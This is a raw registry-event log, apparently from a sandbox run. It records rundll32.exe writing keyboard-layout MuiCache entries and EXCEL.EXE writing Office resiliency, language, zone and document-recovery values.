@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
2656
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
2656
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
2656
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
2656
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
2656
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
pc
70632000AC0C0000010000000000000000000000
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
AC0C000036F2BA01E1F9D40100000000
3244
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3244
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13C131
13C131
04000000AC0C00005200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00640065006C002000320033005F00300034005F003200300031003900200064006F0063002E0020004E00320030003200300033002E0078006C007300000000003400000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00010000000000000070DE9302E1F9D40131C1130031C1130000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13C131
13C131
04000000AC0C00005200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00640065006C002000320033005F00300034005F003200300031003900200064006F0063002E0020004E00320030003200300033002E0078006C007300000000003400000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00010000000000000070DE9302E1F9D40131C1130031C1130000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3244
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1318518808
3244
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1318518936
3244
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1318518788
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{5F691914-C0F0-4E12-8BE0-C92CC647D3F1}
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13C131
13C131
04000000AC0C00005200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00640065006C002000320033005F00300034005F003200300031003900200064006F0063002E0020004E00320030003200300033002E0078006C007300000000003400000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00010000000000000070DE9302E1F9D40131C1130031C1130000000000AC0200000018000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000